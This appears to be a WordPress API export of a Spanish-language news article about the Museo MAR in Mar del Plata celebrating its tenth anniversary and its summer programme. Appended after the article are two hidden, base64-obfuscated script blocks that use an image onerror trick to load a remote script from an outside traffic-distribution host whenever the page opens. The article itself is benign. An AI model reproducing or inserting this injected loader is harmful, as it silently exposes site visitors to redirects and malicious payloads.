{"id":3475,"date":"2024-01-05T11:15:47","date_gmt":"2024-01-05T14:15:47","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3475"},"modified":"2025-08-14T00:02:44","modified_gmt":"2025-08-14T03:02:44","slug":"el-museo-mar-festeja-su-primera-decada-en-el-marco-de-la-temporada-de-verano","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3475","title":{"rendered":"El Museo MAR festeja su primera d\u00e9cada en el marco de la temporada de verano"},"content":{"rendered":"\n<h6 class=\"wp-block-heading has-text-align-right\"><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">POR MARINA SEP\u00daLVEDA<\/mark><\/em><\/h6>\n\n\n\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-33e33e5ea1540017c097d2a1137778fe\"><em>El Museo de Arte contempor\u00e1neo expande los l\u00edmites de las disciplinas y propone, adem\u00e1s, una agenda amplia, diversa, accesible, integrada por artistas bonaerenses. Est\u00e1 ubicado en la zona norte de Mar del Plata y cuenta con la emblem\u00e1tica obra de sitio espec\u00edfico de Marta Minujin y su Lobo de mar dorado.<\/em><\/h4>\n\n\n\n<p>Ubicado en la zona norte de&nbsp;<strong>Mar del Plata<\/strong>&nbsp;y a 10 a\u00f1os de su inauguraci\u00f3n, con la emblem\u00e1tica obra de sitio espec\u00edfico de&nbsp;<strong>Marta Minujin<\/strong>&nbsp;y su Lobo de mar dorado, el&nbsp;<strong>Museo de Arte contempor\u00e1neo (MAR)<\/strong>&nbsp;expande los l\u00edmites de las disciplinas y propone, adem\u00e1s, una agenda amplia, diversa, accesible, integrada por artistas bonaerenses.<\/p>\n\n\n\n<p>Con distintas propuestas y actividades y m\u00e1s de 500 artistas y 2000 obras reunidos en 53 muestras, adem\u00e1s de performances, conciertos, festivales, proyecciones, ciclos para las infancias, las conferencias y presentaciones de libros y talleres el Museo apunta a habitar los m\u00e1s de 7000 metros cuadrados dedicados al&nbsp;<strong>arte contempor\u00e1neo<\/strong>.<\/p>\n\n\n\n<p>La propuesta cultural provincial que hace un a\u00f1o restaur\u00f3 la escultura ideada como obra ef\u00edmera y trocada en permanente de&nbsp;<strong>Minuj\u00edn<\/strong>, cumpli\u00f3 el 27 de diciembre un nuevo aniversario desde su inauguraci\u00f3n.<\/p>\n\n\n\n<p>Como corolario del programa anual de la \u00abAgenda plural de los 10 a\u00f1os\u00bb lanzada en 2023, el&nbsp;<strong>MAR<\/strong>&nbsp;se proyecta en 2024 como extensi\u00f3n conmemorativa que invita a presenciar \u00abuna programaci\u00f3n extendida durante la temporada de verano con propuestas diversas y gratuitas dirigidas a todas las audiencias\u00bb, destinada tanto a los habitantes de la ciudad portuaria y al turismo que la visita.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2023\/12\/65908c5d14a4a_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\"><br>Foto: Prensa.<\/figcaption><\/figure>\n\n\n\n<p>A su vez, el aniversario promueve una programaci\u00f3n no enfocada especialmente en las muestras art\u00edsticas, sino en una serie de actividades entre las cuales la m\u00fasica cobra gran relevancia, como fue el Festival Pleamar realizado a principios de diciembre.<\/p>\n\n\n\n<p>En s\u00ed, la agenda que es impulsada por el&nbsp;<strong>Instituto Cultural de la Provincia de Buenos Aires<\/strong>&nbsp;ofrece un lugar especial a la pr\u00e1ctica art\u00edstica provincial con \u00abpresentaciones de artistas abarcando expresiones musicales de vanguardia y experimentaci\u00f3n, puestas perform\u00e1ticas, cap\u00edtulos sinf\u00f3nicos, festivales de artes electr\u00f3nicas y talleres\u00bb, informaron desde el museo.<\/p>\n\n\n\n<p>En el transcurso de los \u00faltimos a\u00f1os, el&nbsp;<strong>MAR<\/strong>&nbsp;centr\u00f3 su atenci\u00f3n en las producciones bonaerenses, una tarea que contin\u00faa bajo la direcci\u00f3n de&nbsp;<strong>Ezequiel P\u00e9rez S\u00e1enz<\/strong>.<\/p>\n\n\n\n<p>\u00abEl museo tiene pensado este a\u00f1o una programaci\u00f3n que incluye diversas actividades\u00bb, explica el director, adem\u00e1s de las exposiciones de&nbsp;<strong>Luis Felipe No\u00e9<\/strong>, \u00absin duda uno de los artistas m\u00e1s importantes que tenemos en Argentina\u00bb y de Bienalsur, piensan al museo como din\u00e1mico, por lo cual incorporan \u00aben la programaci\u00f3n distintas disciplinas art\u00edsticas\u00bb, porque \u00abel perfil del museo fue variando y este a\u00f1o encontramos en ese dinamismo una expresi\u00f3n que nos permite involucrarlas\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2023\/12\/65908c5d51247_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\"><br>Foto: Prensa.<\/figcaption><\/figure>\n\n\n\n<p>Pero adem\u00e1s, trabajan en articulaci\u00f3n con los salones bonaerenses para la exhibici\u00f3n y con el&nbsp;<strong>Museo Provincial de Bellas Artes<\/strong>&nbsp;Emilio Pettoruti de La Plata desde lo patrimonial.<\/p>\n\n\n\n<p>\u00abEstamos generando acciones que nos permitan mostrar el dinamismo que tiene el museo hoy en d\u00eda, y a su vez darle un empuje al arte contempor\u00e1neo que es la raz\u00f3n de ser del museo, con distintas acciones y con artistas visuales que van a estar exponiendo este a\u00f1o\u00bb, dijo en di\u00e1logo con&nbsp;<strong>T\u00e9lam<\/strong>.<\/p>\n\n\n\n<p>Tambi\u00e9n destac\u00f3 el gran protagonismo del museo \u00abque permiti\u00f3 generar en&nbsp;<strong>Mar del Plata&nbsp;<\/strong>un polo cultural y un polo de desarrollo urban\u00edstico en la zona norte que favoreci\u00f3 a la ciudad\u00bb. Y se\u00f1ala que \u00ab<strong>Mar del Plata<\/strong>&nbsp;con este museo se convirti\u00f3 en un faro\u00bb, pero a su vez, este espacio fue \u00abnecesario habitarlo\u00bb y que los \u00abdistintos artistas pudieran expresarse\u00bb, generando de este modo \u00abuna din\u00e1mica distinta del museo desde los comienzos con la \u00b4Ola pop\u00b4 hasta hoy\u00bb, indica refiri\u00e9ndose a la cualidad diversa y din\u00e1mica del museo que no es el mismo que hace 10 a\u00f1os.<\/p>\n\n\n\n<p>\u00abSignific\u00f3 darle a la ciudad, a la provincia, un salto de calidad en t\u00e9rminos de cultura, identidad, de desarrollo de artistas emergentes, de distintas alternativas que fueron generando una propuesta cultural que Mar del Plata no ten\u00eda, y encontr\u00f3 en el arte contempor\u00e1neo la excusa para poder desplegarla\u00bb, resume&nbsp;<strong>P\u00e9rez S\u00e1enz<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2023\/12\/65908c5d71f81_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\"><br>Foto: Prensa.<\/figcaption><\/figure>\n\n\n\n<p>Pero a esto se suma la importancia de sr una instituci\u00f3n p\u00fablica que permite \u00abgenerar acciones que puedan ser gratuitas\u00bb y est\u00e9 garantizado \u00abpor el Estado el acceso y el disfrute de los bienes culturales\u00bb.<\/p>\n\n\n\n<p>Entre los desaf\u00edos est\u00e1 el trabajo sobre la identidad desde el cual se busca involucrar a los artistas de la provincia en \u00abun espacio que permite y genera las condiciones desde su raz\u00f3n de ser\u00bb, expresa.<\/p>\n\n\n\n<p>Adem\u00e1s, en la b\u00fasqueda de propuestas participativas que contengan e involucren al p\u00fablico, generan \u00abacciones tanto dentro como fuera del museo\u00bb para que las personas \u00abpuedan sentirse parte\u00bb, evadiendo de este modo la distancia tradicional meramente contemplativa.<\/p>\n\n\n\n<p>La forma es \u00abcon una propuesta art\u00edstica que involucre a las artes visuales, performance, danza, espect\u00e1culos asociados, las infancias\u00bb donde se desarrolle \u00abuna propuesta de extensi\u00f3n y educaci\u00f3n participativa, y se invite a la reflexi\u00f3n\u00bb. Y agrega: \u00abEl dinamismo de los museos de hoy en d\u00eda se tiene que ver reflejado en el&nbsp;<strong>Museo MAR<\/strong>&nbsp;porque es un museo muy diverso, por los p\u00fablicos que lo visitan\u00bb.<\/p>\n\n\n\n<p>Por otro lado, m\u00e1s all\u00e1 del rol social, \u00abla propuesta educativa del museo siempre tuvo un rol central\u00bb, indica&nbsp;<strong>P\u00e9rez Sa\u00e9nz<\/strong>, y explica que durante el a\u00f1o trabajan con \u00abinstituciones educativas p\u00fablicas y privadas, asociaciones civiles, organizaciones nucleadas con distintos p\u00fablicos que nos permiten ir construyendo una identidad propia de lo que es hoy el&nbsp;<strong>museo MAR<\/strong>\u00ab.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2023\/12\/65908c5d92e02_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\"><br>Foto: Prensa.<\/figcaption><\/figure>\n\n\n\n<p>\u00abPasamos de considerar al museo un templo de saber a ser una escuela\u00bb, y explica que tratan \u00abde generar un museo que tenga un pulso vital constante, que pueda estar en movimiento\u00bb y otorgue \u00abinstancias que inviten a la reflexi\u00f3n, m\u00e1s que respuestas concretas\u00bb.<\/p>\n\n\n\n<p>\u00abMe parece que el desaf\u00edo en t\u00e9rminos educativos asociados al arte es justamente eso, que quien nos venga a visitar se pueda llevar m\u00e1s dudas que certezas, sobre todo porque el arte contempor\u00e1neo despierta eso en t\u00e9rminos de las subjetividades\u00bb, apunta.<\/p>\n\n\n\n<p>En definitiva, desde lo educativo se apunta a \u00abapropiarse de estas novedades, de este arte contempor\u00e1neo, para poder desplegar alguna l\u00ednea de acci\u00f3n m\u00e1s reflexiva\u00bb, o al menos, se\u00f1ala, que los visitantes puedan decir si les gusta o no lo que vieron, \u00abpero que tambi\u00e9n despierte la chispa de la inquietud, la duda o las ganas investigar un poco m\u00e1s\u00bb.<\/p>\n\n\n\n<p><strong>\u00bfHay un modo de existir especial?&nbsp;<\/strong>\u00abNo s\u00e9 si lo hay, s\u00ed que al ser&nbsp;<strong>Mar del Plata<\/strong>&nbsp;un centro tur\u00edstico central de la provincia y Argentina te obliga a configurar una programaci\u00f3n que contemple esos p\u00fablicos diversos. Sin duda no es lo mismo el verano que otro momento del a\u00f1o para la ciudad, pero para nosotros que pensamos un museo como un espacio receptivo de distintos artistas que puedan expresarse, generar reflexiones asociadas al arte, tratamos de unificar esta programaci\u00f3n y a lo largo del a\u00f1o vamos generando una l\u00ednea com\u00fan de identidad bonaerense. No escapa a esto que en el verano haya una propuesta m\u00e1s l\u00fadica o de esparcimiento porque tambi\u00e9n hay que comprender la complejidad que genera el verano marplatense\u00bb, concluye<strong>&nbsp;P\u00e9rez S\u00e1enz<\/strong>.<\/p>\n\n\n\n<p>Como parte de la agenda 2023, en julio Bienalsur inaugur\u00f3 su cuarta edici\u00f3n con la muestra colectiva \u00abEXTRAordinario\u00bb que re\u00fane obras de 20 artistas de Argentina, Colombia, Uruguay, Brasil, Turqu\u00eda y Francia, curada por Florencia Battiti y Fernando Farina. En la muestra que puede visitarse en dos de las salas, resuenan los aspectos del presente que van desde lo ambiental hasta el consumo, el cuidado hasta la forma en que la vida cotidiana se vuelve extra\u00f1a, como puede observarse en los muebles cortados por la mitad del artista franc\u00e9s Pierre Ardouvin, por ejemplo.<\/p>\n\n\n\n<p>Por otro lado, Luis Felipe \u00abYuyo\u00bb No\u00e9 expone \u00abVisi\u00f3n Quebrada\u00bb que con instalaciones y pinturas propone un recorrido que interpela \u00abla funci\u00f3n del artista\u00bb donde \u00abla pintura de No\u00e9 se expande, atraviesa disciplinas y arma un entretejido de materialidades\u00bb, seg\u00fan indica la curadora&nbsp;<strong>Cecilia Ivanchevich<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2023\/12\/65908c5db57ce_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\"><br>Foto: Prensa.<\/figcaption><\/figure>\n\n\n\n<p>El&nbsp;<strong>MAR<\/strong>, proyectado por el Estudio Monoblock fue inaugurado tras cuatro a\u00f1os de construcci\u00f3n en 2013, siendo uno de los pocos museos dise\u00f1ados desde el vamos para este fin, algo que queda como testimonio visual en el video lanzado el d\u00eda del aniversario en el canal de YouTube @museo_mar.<\/p>\n\n\n\n<p>Considerado uno de los museos m\u00e1s grandes y modernos del pa\u00eds, ha recibido millones visitas a sus muestras, mientras que miles de personas asistieron a recitales, conferencias, proyecciones de cine y festivales, adem\u00e1s de contar con el \u00abprograma de articulaci\u00f3n y extensi\u00f3n educativa\u00bb.<\/p>\n\n\n\n<p>Las tres salas de exhibici\u00f3n tienen \u00ablas virtudes necesarias para convertirlas en multifac\u00e9ticas y adaptables a los requerimientos potenciales de diferentes tipos de muestras\u00bb, indican sobre un dise\u00f1o espacial maximizado.<\/p>\n\n\n\n<p>Para su inauguraci\u00f3n,<strong>&nbsp;Minuj\u00edn<\/strong>&nbsp;mont\u00f3 un \u00abLobo Marino de Alfajores\u00bb en el exterior del museo que pas\u00f3 a ser la primera obra patrimonial del MAR.<\/p>\n\n\n\n<p>Se trata de una instalaci\u00f3n de 10 metros de altura realizada en hierro y metal recubierta por 50.000 envoltorios de alfajores Havanna. La acci\u00f3n inicial era ofrecer uno de esos papeles para ser canjeado por los \u00abespectadores\u00bb por un alfajor de verdad (llegando a los 14 mil intercambiados), fusion\u00e1ndose en ese acto \u00ablas esculturas de lobos marinos de Jos\u00e9 Fioravanti y los alfajores marplatenses\u00bb.<\/p>\n\n\n\n<p>La programaci\u00f3n estival comenzar\u00e1 el 5 de enero con&nbsp;<strong>\u00abCaf\u00e9 Cultura en el MAR\u00bb<\/strong>, en el auditorio, y cerrar\u00e1 el 24 de febrero con \u00abJugando al juego que jugamos\u00bb del Ciclo para Infancias. Las actividades pueden consultarse en&nbsp;<strong><a href=\"https:\/\/www.telam.com.ar\/notas\/202312\/650665-museo-mar-mar-del-plata-programacion-verano.html\" target=\"_blank\" rel=\"noreferrer noopener\">la web de T\u00e9lam<\/a><\/strong>.<\/p>\n\n\n\n<p>A su vez, el programa de extensi\u00f3n propone los espacios de La Isla con actividades did\u00e1cticas que funcionar\u00e1 todos los d\u00edas de 16 a 21:30; el Espacio Laboratorio como lugar de reflexi\u00f3n y el Espacio Salas que a las 20 invitar\u00e1 a recorridos participativos de la muestra de No\u00e9; mientras que diariamente, entre las 16 y 19 tendr\u00e1n lugar las actividades semanales sobre distintas tem\u00e1ticas en el museo, que abre de 16 a 22, de martes a domingos.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202312\/651146-el-museo-mar-festeja-su-primera-decada-en-el-marco-de-la-temporada-de-verano.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"964\" height=\"96\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-664\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg 964w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-768x76.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-696x69.jpeg 696w\" sizes=\"(max-width: 964px) 100vw, 964px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>POR MARINA SEP\u00daLVEDA El Museo de Arte contempor\u00e1neo expande los l\u00edmites de las disciplinas y propone, adem\u00e1s, una agenda amplia, diversa, accesible, integrada por artistas bonaerenses. Est\u00e1 ubicado en la zona norte de Mar del Plata y cuenta con la emblem\u00e1tica obra de sitio espec\u00edfico de Marta Minujin y su Lobo de mar dorado. Ubicado [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3476,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,9],"tags":[],"class_list":{"0":"post-3475","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3475"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3475"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3475\/revisions"}],"predecessor-version":[{"id":6882,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3475\/revisions\/6882"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3476"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3475"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3475"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3475"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}